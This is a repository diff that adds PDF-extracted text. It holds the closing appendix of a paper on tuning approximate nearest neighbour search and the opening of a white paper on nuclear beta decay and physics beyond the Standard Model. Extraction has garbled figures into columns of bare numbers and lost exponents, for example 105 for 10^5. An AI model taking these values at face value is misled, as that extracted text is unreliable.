+ dataset differs at the X5 level with its PQ setting (using 2 dimensions per subspace instead of 1), but
1334
+ this was only to fit the higher-dimensional dataset into the same RAM footprint.
1335
+ Even though our technique cannot set these VQ and PQ parameters, the fact that we can achieve
1336
+ excellent performance on all three datasets using the same VQ and PQ parameters, despite these
1337
+ datasets giving drastically different speed/recall Pareto frontiers, suggests the VQ and PQ parameters
1338
+ are not as difficult a part of the tuning problem and have more predictable good settings than the
1339
+ hyperparameters our technique deals with.
1340
+ 17
1341
+
1342
+ A.7
1343
+ IMPACT OF QUERY SAMPLE SIZE ON HYPERPARAMETER TUNING QUALITY
1344
+ 0.68
1345
+ 0.70
1346
+ 0.72
1347
+ 0.74
1348
+ 0.76
1349
+ 0.78
1350
+ 0.80
1351
+ 0.82
1352
+ Recall@10
1353
+ 15000
1354
+ 20000
1355
+ 25000
1356
+ 30000
1357
+ 35000
1358
+ 40000
1359
+ 45000
1360
+ 50000
1361
+ 55000
1362
+ Queries per Second
1363
+ 100 Queries
1364
+ 1000 Queries
1365
+ 10000 Queries
1366
+ Figure 7: Achieved search throughput and recall for tunings generated from different query sample
1367
+ sizes on the Microsoft Turing-ANNS billion-scale dataset.
1368
+ A larger query sample should lead to our optimization finding better hyperparameter tunings, but
1369
+ would also lead to greater cost in computing L, whose runtime is linear in the query sample size.
1370
+ In this section, we explicitly measure the effect of increasing query sample size by taking the 105
1371
+ queries from the MS-Turing dataset of big-ann-benchmarks, holding out 104 queries as a test
1372
+ set, and sampling subsets of 100, 1000, and 10000 queries from the remaining 9 × 104 queries. For
1373
+ each subset size, nine samples were taken, all disjoint from other subsets of the same size.
1374
+ For each query subset, we run our constrained optimization technique to generate low, medium, and
1375
+ high search cost ANN algorithm hyperparameter tunings, and measure the resulting recall and search
1376
+ throughput on the holdout query set. The search cost targets for the low, medium, and high settings
1377
+ were J(t) = 2 × 10−6, 5 × 10−6, and 1.2 × 10−5, respectively. The resulting recalls and throughputs
1378
+ are plotted in Figure 7.
1379
+ We can see that increasing the query sample size from 100 to 1000 leads to considerably less variance,
1380
+ with the resulting hyperparameters more consistently approaching the global cost-recall Pareto
1381
+ frontier. However, increasing the sample size further from 1000 to 10000 has very marginal impact.
1382
+ The query sample size was kept at 1000 for the experiments in Section 5.2, and is reflected in the
1383
+ vCPU-hour measurement in Appendix A.6.
1384
+ A.8
1385
+ PERFORMANCE OF FEW-LEVEL QUANTIZATION HIERARCHIES ON DEEP1B
1386
+ In Section 5.2 we use a five-level quantization hierarchy to search the DEEP1B, Microsoft Turing-
1387
+ ANNS, and Yandex Text-to-Image datasets from big-ann-benchmarks. Our hyperparameter
1388
+ tuning technique was necessary because the four-dimensional hyperparameter search space was
1389
+ impractically large for grid search. If we had built an ANN search index with fewer quantization
1390
+ levels, a simpler grid search approach could be used to find effective hyperparameters; in this section,
1391
+ we confirm that such shallow search indices perform poorly on DEEP1B, thereby ruling out grid
1392
+ search as a viable option.
1393
+ To test this, we take the original quantization hierarchy, described in Figure 6, and modify it in two
1394
+ ways. In one, we keep only the top-level 4 × 104 VQ centroids and remove the intermediate layer of
1395
+ 4 × 106 centroids, to create the Shallow-Small quantization index; in the other, we remove the
1396
+ top-level centroids and only keep the 4 × 106 centroids from the middle layer of the hierarchy. These
1397
+ two modified quantization indices are illustrated in Figure 8.
1398
+ 18
1399
+
1400
+ ˜
1401
+ X1: Level 1 PQ
1402
+ 4 · 104 × 12 bytes; ∼ 480KB
1403
+ ˜
1404
+ X2: Level 1 Centroids (int8)
1405
+ 4 · 104 × 96 bytes; ∼ 3.84MB
1406
+ ˜
1407
+ X3: Dataset PQ
1408
+ 109 × 48 bytes; ∼ 48GB
1409
+ Dataset (int8, not stored)
1410
+ 109 × 96 bytes; ∼ 96GB
1411
+ (a) Shallow-Small quantization index
1412
+ ˜
1413
+ X1: Level 1 PQ
1414
+ 4 · 106 × 16 bytes; ∼ 64MB
1415
+ ˜
1416
+ X2: Level 1 Centroids (int8)
1417
+ 4 · 106 × 96 bytes; ∼ 384MB
1418
+ ˜
1419
+ X3: Dataset PQ
1420
+ 109 × 48 bytes; ∼ 48GB
1421
+ Dataset (int8, not stored)
1422
+ 109 × 96 bytes; ∼ 96GB
1423
+ (b) Shallow-Large quantization index
1424
+ Figure 8: The two quantization hierarchies we compare in this experiment against the original one
1425
+ used in Section 5.2 and described in Figure 6.
1426
+ The Shallow-Small and Shallow-Large indices both have three quantization levels and
1427
+ therefore a two-dimensional hyperparameter search space. We use grid search to explore this space,
1428
+ and plot in Figure 9 the resulting speed-recall Pareto frontiers against the original frontier from
1429
+ Section 5.2.
1430
+ We see that both Shallow-Small and Shallow-Large perform extremely poorly relative to the
1431
+ original five-layer index. Qualitatively, Shallow-Small has too many datapoints assigned to each
1432
+ of its 4 × 104 centroids, which implies the search cost of further searching any centroid is high; in
1433
+ addition, any given datapoint is unlikely to be quantized well by its centroid (due to the relatively low
1434
+ number of centroids), so the quality of results also tends to be low. Meanwhile, Shallow-Large
1435
+ has so many centroids that it always spends a large fixed cost on level 1 PQ distance computation.
1436
+ 0
1437
+ 10000
1438
+ 20000
1439
+ 30000
1440
+ 40000
1441
+ 50000
1442
+ 60000
1443
+ 70000
1444
+ 80000
1445
+ 90000
1446
+ 100000
1447
+ 0.5
1448
+ 0.55
1449
+ 0.6
1450
+ 0.65
1451
+ 0.7
1452
+ 0.75
1453
+ 0.8
1454
+ Speed (Queries per Second)
1455
+ Accuracy (Recall@10)
1456
+ Shallow-Small
1457
+ Shallow-Large
1458
+ Original
1459
+ Figure 9: Both three-level quantization indices perform very poorly relative to the original five-layer
1460
+ quantization index on DEEP1B.
1461
+ 19
1462
+
59AzT4oBgHgl3EQfvP0x/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
5NE2T4oBgHgl3EQfkAfy/content/tmp_files/2301.03975v1.pdf.txt ADDED
@@ -0,0 +1,1523 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Nuclear β decay as a probe for physics beyond the Standard Model
2
+ M. Brodeur,1 N. Buzinsky,2 M.A. Caprio,1 V. Cirigliano,3 J.A. Clark,4 P.J. Fasano,1 J.A. Formaggio,5
3
+ A.T. Gallant,6 A. Garcia,2 S. Gandolfi,7 S. Gardner,8 A. Glick-Magid,2 L. Hayen,9, 10 H. Hergert,11, 12
4
+ J. D. Holt,13, 14 M. Horoi,15 M.Y. Huang,16 K.D. Launey,17 K.G. Leach,18, 19 B. Longfellow,6 A. Lovato,20
5
+ A.E. McCoy,19, 21 D. Melconian,22, 23 P. Mohanmurthy,5 D.C. Moore,24 P. Mueller,4 E. Mereghetti,25
6
+ W. Mittig,26, 19 P. Navratil,13 S. Pastore,21, 27 M. Piarulli,21, 27 D. Puentes,26, 19 B.C. Rasco,28 M. Redshaw,15
7
+ G.H. Sargsyan,6 G. Savard,4, 29 N.D. Scielzo,6 C.-Y. Seng,2, 19 A. Shindler,11, 12 S.R. Stroberg,1
8
+ J. Surbrook,26, 19 A. Walker-Loud,30 R. B. Wiringa,31 C. Wrede,26, 19 A. R. Young,32, 33 and V. Zelevinsky26, 19
9
+ 1Department of Physics and Astronomy, University of Notre Dame, Notre Dame, IN 46556 USA
10
+ 2Department of Physics, University of Washington, Seattle, Washington 98195, USA
11
+ 3Institute for Nuclear Theory, University of Washington, Seattle, WA 98195, USA
12
+ 4Physics Division, Argonne National Laboratory, Lemont, Illinois 60439, USA
13
+ 5Laboratory for Nuclear Science, Massachusetts Institute of Technology, 77 Mass. Ave., Cambridge, MA 02139
14
+ 6Nuclear and Chemical Sciences Division, Lawrence Livermore National Laboratory, Livermore, California 94550, USA
15
+ 7Theoretical Division, Los Alamos National Laboratory
16
+ 8Department of Physics and Astronomy, University of Kentucky, Lexington, KY 40506-0055
17
+ 9Department of Physics, North Carolina State University, Raleigh, North Carolina 27695, USA
18
+ 10Triangle Universities Nuclear Laboratory, Durham, North Carolina 27708, USA
19
+ 11Facility for Rare Isotope Beams, Michigan State University, East Lansing, Michigan 48824, USA
20
+ 12Department of Physics & Astronomy, Michigan State University, East Lansing, Michigan 48824, USA
21
+ 13TRIUMF, Vancouver, BC V6T 2A3, Canada
22
+ 14Department of Physics, McGill University, Montréal, QC H3A 2T8, Canada
23
+ 15Department of Physics, Central Michigan University, Mount Pleasant, MI 48859, USA
24
+ 16Department of Physics and Astronomy, Iowa State University, Ames, IA 50011, USA
25
+ 17Department of Physics and Astronomy, Louisiana State University, Baton Rouge, LA 70803, USA
26
+ 18Department of Physics, Colorado School of Mines, Golden, CO 80401, USA
27
+ 19Facility for Rare Isotope Beams, Michigan State University, East Lansing, MI 48824, USA
28
+ 20Physics Division, Argonne National Laboratory, Lemont IL 60439, USA
29
+ 21Department of Physics, Washington University in Saint Louis, Saint Louis, MO 63130, USA
30
+ 22Cyclotron Institute, Texas A&M University, 3366 TAMU, College Station, Texas 77843-3366, USA
31
+ 23Department of Physics and Astronomy, Texas A&M University,
32
+ 4242 TAMU, College Station, Texas 77843-4242, USA
33
+ 24Wright Laboratory, Department of Physics, Yale University, New Haven, CT 06520, USA
34
+ 25Los Alamos National Laboratory, Los Alamos, NM 87545, USA
35
+ 26Department of Physics and Astronomy, Michigan State University, East Lansing 48824, USA
36
+ 27McDonnell Center for the Space Sciences at Washington University in St. Louis, MO 63130, USA
37
+ 28Physics Division, Oak Ridge National Laboratory, Oak Ridge, TN 37830, USA
38
+ 29Department of Physics, University of Chicago, Chicago, Illinois 60637, USA
39
+ 30Nuclear Science Division, Lawrence Berkeley National Laboratory, Berkeley, CA, 94720, USA
40
+ 31Physics Division, Argonne National Laboratory, Lemont, IL 60439, USA
41
+ 32Department of Physics, North Carolina State University, Raleigh 27695, USA
42
+ 33Triangle Universities Nuclear Laboratory, Duke University, Durham 27708, USA
43
+ (Dated: January 11, 2023)
44
+ This white paper was submitted to the 2022 Fundamental Symmetries, Neutrons, and Neutrinos
45
+ (FSNN) Town Hall Meeting in preparation for the next NSAC Long Range Plan. We advocate to
46
+ support current and future theoretical and experimental searches for physics beyond the Standard
47
+ Model using nuclear β decay.
48
+ I.
49
+ RECOMMENDATIONS
50
+ The nuclear β-decay research community has made im-
51
+ pressive progress, both in theory and experiment, since
52
+ the previous long range plan was implemented. A wide
53
+ variety of nuclear systems provide enhanced sensitivity
54
+ to phenomena that can arise in beyond the Standard
55
+ Model (BSM) contributions to the electroweak interac-
56
+ tion. At the level of precision currently being achieved
57
+ for this type of fundamental symmetries research, nu-
58
+ merous higher-order corrections need to be accounted for
59
+ through nuclear theory. In addition to progress on im-
60
+ proving the determination of electroweak radiative cor-
61
+ rections, one of the most dramatic developments has been
62
+ the emergence of new many-body methods with control-
63
+ lable uncertainties that can be applied in a wide range
64
+ of relevant nuclei.
65
+ This progress has set the stage for
66
+ productive interactions between theory and experiment
67
+ to reassess and sharpen theoretical uncertainties and to
68
+ arXiv:2301.03975v1 [nucl-ex] 10 Jan 2023
69
+
70
+ 2
71
+ interpret the high-quality data being collected with ad-
72
+ vanced experimental systems.
73
+ One of the central goals for the coming years is to place
74
+ the on-going work with allowed decays on a more rigor-
75
+ ous theoretical footing and push the precision frontier for
76
+ the experimental campaigns targeting a set of key nuclei.
77
+ These activities should produce improved results both for
78
+ the "top-row" unitarity test and for the search for exotic
79
+ couplings, allowing nuclear β decay to continue to be at
80
+ the forefront in probing new physics in charged current
81
+ weak interactions.
82
+ The remarkable progress on theory has been accompa-
83
+ nied by a number of successful experimental programs
84
+ that highlight the impact of relatively small-scale re-
85
+ search efforts. These experiments have achieved the high-
86
+ est precision measurements to date of the β-asymmetry
87
+ with 37K and the β-ν angular correlation with 8Li. At the
88
+ same time, we have developed new spectroscopic tech-
89
+ niques using cyclotron resonance spectroscopy (CRES),
90
+ superconducting tunnel junctions, and novel ion-trapping
91
+ systems. These advances are poised to yield a wealth of
92
+ results with unprecedented precision that provide multi-
93
+ ple stringent constraints on BSM scenarios.
94
+ The community’s recommendations for advancing fun-
95
+ damental symmetries research using nuclear β decays are:
96
+ • Accelerating progress on improving constraints on
97
+ BSM scenarios and clarifying the status of the
98
+ Cabibbo angle anomaly through the formation of
99
+ a center to study fundamental symmetries with β
100
+ decay that strengthens collaboration between ex-
101
+ periment and theory.
102
+ • Increasing investment in small-scale and mid-
103
+ scale projects and initiatives at universities, the
104
+ ARUNA laboratories, and national laboratories to
105
+ exploit the strengths of existing facilities and cre-
106
+ ate pipelines for highly-qualified personnel into the
107
+ field.
108
+ • Establishing robust and sustained support for the
109
+ nuclear theory effort, which entails workforce devel-
110
+ opment at all levels (students, post-docs, faculty)
111
+ and viable career paths.
112
+ • Pursuing and developing the cutting-edge ex-
113
+ perimental techniques used to perform model-
114
+ independent searches for BSM neutrino physics via
115
+ β decay, with the goal of a direct absolute neutrino
116
+ mass measurement.
117
+ • The nuclear beta decay community strives to pro-
118
+ mote a diverse and inclusive environment while ad-
119
+ vocating for an increased financial support that
120
+ would improve our graduate student standard of
121
+ living.
122
+ • We recommend several items that would facil-
123
+ itate fundamental symmetry research at FRIB.
124
+ These include the development of a solid stop-
125
+ per, a helium-jet ion source for commensal beam
126
+ operation, means and staff support for producing
127
+ beams and sources at FRIB from harvested iso-
128
+ topes, for example by using the existing batch mode
129
+ ion source (BMIS), and more usable space for such
130
+ future large precision experiments.
131
+ II.
132
+ INTRODUCTION
133
+ Over the past decade, β-decay experiments have sig-
134
+ nificantly extended the frontiers of knowledge on physics
135
+ beyond the Standard Model. This has been done using a
136
+ variety of probes including angular-correlation measure-
137
+ ments (e.g., [1–4]) and precise ft-value measurements
138
+ [5, 6]. Further planned experimental efforts using differ-
139
+ ent techniques will reliably discover or set stronger con-
140
+ straints on BSM physics effects [7]. Such measurements
141
+ are done both at National and University laboratories.
142
+ New experiments will achieve precision of 0.1% or better,
143
+ enabling them to reach TeV-scale physics [7], and in most
144
+ case to compete with high-energy searches at the Large
145
+ Hadron Collider [8]. Important recent developments in
146
+ nuclear theory now allow fundamental physics to be ex-
147
+ tracted from experiments at this level of precision.
148
+ Nuclear β decay transitions can be used to extract Vud
149
+ to test the CKM matrix unitarity, probe the presence
150
+ of scalar and tensor currents, tensor coupling to right-
151
+ handed neutrinos, search for sterile neutrino, and con-
152
+ tribute to the neutrino mass determination.
153
+ The type of transition used to probe BSM physics in-
154
+ clude superallowed pure Fermi between 0+ states, su-
155
+ perallowed mixed between mirror nuclei, allowed pure
156
+ Gamow-Teller, first-forbidden, as well as some specific
157
+ electron-capture and ultra-low Q-value transitions.
158
+ In this white paper we will highlight recent achieve-
159
+ ments, concisely articulate the scientific opportunities,
160
+ and give the path towards discoveries using each of these
161
+ nuclear β decay transitions in the next decade and be-
162
+ yond.
163
+ III.
164
+ CKM MATRIX UNITARITY TESTS
165
+ A.
166
+ Motivation
167
+ Precise tests of the CKM matrix top-row unitarity are
168
+ a unique, model-independent probe having discovery po-
169
+ tential for new physics at the 10 TeV scale with current
170
+ precision levels [7]. β decay supplies over 95% of the top-
171
+ row sum data. Following recent broad theory progress
172
+ and signs of top-row unitarity violation at the > 3σ level,
173
+ we are in a most opportune time to deliver a comprehen-
174
+ sive advancement in the determination of the Vud matrix
175
+ element using nuclear β decays. In particular, mature ab
176
+
177
+ 3
178
+ initio nuclear theory efforts and a high-precision nuclear
179
+ data set underscore the potential/need for a concerted ef-
180
+ fort between theory and experiment. Formation of a topi-
181
+ cal group, the VUDU (Vud Unitarity) alliance, would fos-
182
+ ter further collaboration, strengthen theory benchmark-
183
+ ing efforts, amplify the impact of focused experimental
184
+ efforts and sustain the leadership role of the nuclear β
185
+ decay community in precision CKM unitarity tests.
186
+ B.
187
+ Progress
188
+ The Vud element of the CKM matrix can be determined
189
+ from the β decays of the pion, neutron, pure Fermi 0+ to
190
+ 0+ and mixed, mirror nuclear decays [9]. The current sta-
191
+ tus is summarized in Fig. 1 showing the fractional uncer-
192
+ tainty due to experimental input, electroweak radiative
193
+ corrections, and nuclear structure corrections where rel-
194
+ evant. Currently, the most precise determination of Vud
195
+ is obtained from 0+ → 0+ nuclear decays, where a collec-
196
+ tion of more than 200 measurements in 21 different nuclei
197
+ allow for a significant statistical advantage. Its precision
198
+ is currently limited by uncertainties in sub-percent level
199
+ nuclear structure corrections, the improvement of which
200
+ is a strong driver for theoretical advances and comprises
201
+ one of the major goals in the field.
202
+ 0.00
203
+ 0.05
204
+ 0.10
205
+ 0.15
206
+ 0.20
207
+ 0.25
208
+ Frac. Unc (%)
209
+ 0 +
210
+ 0 +
211
+ Neutron
212
+ Mirror
213
+ Pion
214
+ Experiment
215
+ Radiative
216
+ Nuclear
217
+ Figure 1. Fractional uncertainties to the Vud extraction from
218
+ the most precise channels.
219
+ Significant theoretical progress in the calculation of ra-
220
+ diative corrections using dispersion relations was made
221
+ possible by a critical paradigm shift and served to reduce
222
+ uncertainties due to radiative corrections in all systems
223
+ by at least a factor of two [10, 11]. The resultant 3σ shift
224
+ compared to the previous state of the art for the neutron
225
+ and nuclear decays has been confirmed by several inde-
226
+ pendent calculations [12–14], and have been shown to be
227
+ systematically improvable using lattice QCD calculations
228
+ [15–17].
229
+ Leveraging improvements in the theory framework, nu-
230
+ clear structure effects in electroweak radiative corrections
231
+ (denoted δNS) were reevaluated and resulted in substan-
232
+ tial changes when including quasi-elastic and nuclear po-
233
+ larization effects. These were initially treated in simpli-
234
+ fied models and increased the uncertainty on the resul-
235
+ tant Vud determination from 0+ → 0+ decays by 50% due
236
+ to fully correlated theoretical uncertainties [11, 18, 19].
237
+ A fully-relativistic framework [20] permits rigorous stud-
238
+ ies of δNS using ab initio methods; the past two decades
239
+ have witnessed a tremendous progress of the latter in the
240
+ description of nuclei. This was due to the advent of ef-
241
+ fective field theories that link nuclear many-body interac-
242
+ tions and electroweak currents to the fundamental sym-
243
+ metries of the underlying theory of Quantum Chromody-
244
+ namics [21–30]; the development of new algorithms suited
245
+ to solve the many-body nuclear problem for nuclei in the
246
+ medium mass region and beyond [31]; and the increased
247
+ availability of computational resources [32]. Capitalizing
248
+ on these recent developments, the theory community is
249
+ poised to provide improved theoretical estimates for the
250
+ nuclear structure effects in radiative corrections (δNS)
251
+ and isospin breaking effects (δC).
252
+ There has been a surge of experimental activity in the
253
+ past years around mirror transitions at various institu-
254
+ tions world-wide including: half-life (37K [33], 21Na [34]
255
+ and 29P [35]) and branching ratio (37K [36]) measure-
256
+ ments at Texas A&M University; half-life measurements
257
+ of 11C [37], 13N [38], 15O [39], 25Al [40] and 29P [41] at
258
+ the University of Notre Dame; QEC-value measurements
259
+ of 11C [42], 21Na and 29P using LEBIT at NSCL [43]; and
260
+ with significant development of 99.13(9)% nuclear polar-
261
+ ization via optical pumping [44], a precise β-asymmetry
262
+ measurement of 37K using TRINAT at TRIUMF im-
263
+ proved the value of Vud for this isotope by a factor of
264
+ 4 [45].
265
+ C.
266
+ Prospects
267
+ Significant progress in the determination of nuclear
268
+ structure correction using nuclear ab initio methods are
269
+ paramount in order to maximize the potential of the su-
270
+ perallowed global data set for Vud extraction.
271
+ In par-
272
+ ticular, a benchmarking effort centered around low mass
273
+ nuclei with high precision experimental data (6He, 10,11C,
274
+ 14O,
275
+ 19Ne) that are accessible to nuclear many-body
276
+ methods with a minimum number of approximations (No
277
+ Core Shell Model, Quantum Monte Carlo, Lattice Effec-
278
+ tive Field Theory, . . .) and methods with a wider mass
279
+ reach (Coupled Cluster, In Medium Similarity Renor-
280
+ malization Group, and hybrid models) will allow one
281
+ to reliably compute corrections for the full data set.
282
+ Supplemented by focused experimental measurements of
283
+ 0+ → 0+ and mirror decays, the community foresees a
284
+ synergistic approach with maximal impact. Given that
285
+ the uncertainties for the value of Vud determined from the
286
+ superallowed decays are dominated by the uncertainty
287
+ in theoretical corrections due to nuclear structure effects
288
+ in the electroweak radiative corrections, we can antici-
289
+
290
+ 4
291
+ pate significant progress in the precision with which these
292
+ are calculated and a reduction in the uncertainty budget
293
+ for the superallowed data set during the next long range
294
+ planning period. This should shift uncertainties in Vud
295
+ back to the electroweak radiative corrections for the nu-
296
+ cleon (and presumably kaon decay). The more challeng-
297
+ ing goal of quantifying and reducing uncertainties in the
298
+ analysis of isospin-mixing effects will proceed in parallel,
299
+ with an immediate increment in precision for some BSM
300
+ tests when this goal is achieved.
301
+ In particular, there is a strong need for more precise
302
+ measurements of the branching ratio of the 0+ → 0+
303
+ transitions of 10C and 14O. Both of these isotopes weigh
304
+ in most on searches for exotic scalar currents through
305
+ a non-zero Fierz interference term.
306
+ Through the de-
307
+ velopment of quantum sensors at radioactive ion beam
308
+ facilities (e.g. using superconducting tunnel junctions),
309
+ measurements of the branching ratios of both could be
310
+ performed through recoil spectroscopy as a way of avoid-
311
+ ing common systematic effects. Additional information
312
+ on recoil-order and isospin breaking corrections may be
313
+ obtained using precise electroweak nuclear radii measure-
314
+ ments in several isotriplet systems [46, 47]. On the the-
315
+ ory side, a reliable determination by ab initio methods
316
+ of both the δC and δNS nuclear structure corrections for
317
+ 10C and 14O transitions is now within the reach.
318
+ The β-delayed proton decays of 20Mg, 24Si, 28S, 32Ar
319
+ and 36Ca, to be studied at TAMUTRAP [48], will pro-
320
+ vide alternate 0+ → 0+ cases once the 3He-LIG system
321
+ at the Cyclotron Institute is fully commissioned. These
322
+ near-proton-dripline cases will have vastly different ex-
323
+ perimental systematics and provide a demanding test of
324
+ isospin-symmetry-breaking corrections (δC).
325
+ Superallowed mixed β decay transitions between mir-
326
+ ror nuclei have been proposed as an independent means
327
+ to extract the Vud element of the CKM matrix [49] by
328
+ measuring the mixing ratio through, e.g., angular cor-
329
+ relations. While this requires an additional experimen-
330
+ tal input, substantial enhancements are available through
331
+ near-cancellation of the observable, exceeding that of the
332
+ neutron (e.g.17F) to up to a factor 13 (19Ne) [50]. Besides
333
+ multiple on-going analysis and future half-life, branching
334
+ ratio, and QEC-value measurements, several efforts to
335
+ measure correlation parameters in mirror transitions are
336
+ underway. These includes more precise angular correla-
337
+ tion measurements (aβν, Aβ, recoil-asymmetry, . . . ) of
338
+ K and Rb isotopes with TRINAT, and the St. Benedict
339
+ ion trapping system [51, 52] at the University of Notre
340
+ Dame that will be devoted to measuring β-ν angular cor-
341
+ relations in multiple mirror transitions including the very
342
+ sensitive 17F.
343
+ Recently, the use of superconducting tunnel junctions
344
+ has shown tremendous promise for precision spectroscopy
345
+ of recoiling ions following nuclear beta decay with vastly
346
+ different systematic corrections to traditional approaches
347
+ [53, 54].
348
+ Unlike other quantum sensors, the microsec-
349
+ ond(s) response time enables both high precision and
350
+ high count rate spectroscopy, making them an ideal
351
+ emerging technology for use at radioactive ion beam fa-
352
+ cilities. The Superconducting Array for Low Energy Ra-
353
+ diation (SALER) targets precision recoil spectroscopy
354
+ of short-lived mirror isotopes such as 11C, which can
355
+ open additional channels for precision Vud determina-
356
+ tions. This includes isotopes typically inaccessible using
357
+ ion or atom trap technology due to their long lifetimes,
358
+ thereby providing complementary input.
359
+ Besides a strong potential for a competitive Vud ex-
360
+ traction, additional precision measurements in the low
361
+ mass range (A < 20) provide critical input for nuclear
362
+ ab initio theory efforts to benchmark and improve the
363
+ nuclear structure corrections limiting the 0+ → 0+ Vud
364
+ determination.
365
+ IV.
366
+ SEARCHES FOR TENSOR AND SCALAR
367
+ CURRENTS
368
+ A.
369
+ Motivation
370
+ Detailed studies of angular correlations in nuclear β
371
+ decay played a key role in elucidating the “vector-minus-
372
+ axial vector” (V−A) structure of the charged current elec-
373
+ troweak interaction, which is mediated by the W boson.
374
+ Today, nuclear β decay efforts remain at the forefront
375
+ in searches for evidence of the additional scalar (S) and
376
+ tensor (T) Lorentz-invariant interactions that naturally
377
+ arise in SM extensions. Measurements of the β-ν angular
378
+ correlation, the β asymmetry, and the Fierz interference
379
